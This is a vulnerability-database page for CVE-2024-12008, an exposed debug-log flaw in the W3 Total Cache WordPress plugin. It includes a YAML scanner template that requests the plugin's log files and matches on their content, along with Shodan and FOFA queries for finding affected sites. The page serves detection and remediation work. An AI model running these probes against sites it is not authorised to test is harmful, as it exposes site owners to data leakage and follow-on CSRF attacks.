/Vulnerability Library

W3 Total Cache < 2.8.2 - Log File Exposure

CVE-2024-12008
Early Release

Description

The plugin is vulnerable to Information Exposure through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks.

Severity

Medium

CVSS Score

5.3

Exploit Probability

56%

Affected Product

w3-total-cache

Published Date

June 11, 2026

Template Author

ritikchaddha

CVE-2024-12008.yaml
id: CVE-2024-12008

info:
  name: W3 Total Cache < 2.8.2 - Log File Exposure
  author: ritikchaddha
  severity: medium
  description: |
    The plugin is vulnerable to Information Exposure through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks.
  impact: |
    Unauthenticated attackers can extract sensitive credentials, leading to potential account compromise and further attacks.
  remediation: |
    Update the W3 Total Cache plugin to version 2.8.2 or later, which restricts access to debug log files. Additionally, disable debug logging in production environments and ensure .htaccess rules block direct access to the cache/log directory.
  reference:
    - https://wpscan.com/vulnerability/1685ca58-1622-433b-b561-304cb9d1bc56/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8292f23c-fb17-4082-9788-f643d1bb097e
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12008
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-12008
    epss-score: 0.56176
    epss-percentile: 0.98155
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 3
    vendor: boldgrid
    product: w3-total-cache
    framework: wordpress
    shodan-query: http.component:"WordPress" http.component:"W3 Total Cache"
    fofa-query: app="WordPress-W3-Total-Cache"
  tags: cve,cve2024,wordpress,wp,wp-plugin,w3-total-cache,exposure,logs

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/cache/log/000000/pagecache.log"
      - "{{BaseURL}}/wp-content/cache/log/000000/minify.log"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'regex("\\[[A-Za-z]{3}, \\d{2} [A-Za-z]{3} \\d{4} \\d{2}:\\d{2}:\\d{2} [+-]\\d{4}\\]", body)'
          - 'contains(body, "[/] [-]")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220780191b6c1c262f24117ce17bc3397d4a07e5e9c0cd73acd28db813715057d9602201f8efd4bc6b0a8605485fe453121075c4858842a45f377af6e604d5a1aa99168:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2024-12008
CWE ID:
cwe-532

References

https://wpscan.com/vulnerability/1685ca58-1622-433b-b561-304cb9d1bc56/https://www.wordfence.com/threat-intel/vulnerabilities/id/8292f23c-fb17-4082-9788-f643d1bb097ehttps://nvd.nist.gov/vuln/detail/CVE-2024-12008

Remediation Steps

Update the W3 Total Cache plugin to version 2.8.2 or later, which restricts access to debug log files. Additionally, disable debug logging in production environments and ensure .htaccess rules block direct access to the cache/log directory.